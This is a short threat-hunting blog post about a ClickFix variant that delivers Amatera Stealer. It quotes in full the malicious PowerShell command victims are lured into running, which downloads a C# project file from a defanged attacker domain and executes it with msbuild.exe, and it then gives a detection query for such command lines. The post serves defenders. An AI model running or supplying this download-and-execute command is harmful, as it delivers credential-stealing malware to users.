172. Another Curious ClickFix PowerShell Command

Hello everyone!

I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste.

Proofpoint has published a report on Amatera Stealer, and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog:

powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"

The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe.

So, as always, we can use suspicious command line arguments for detection, for example:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: (*msbuild* AND *csproj*)

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge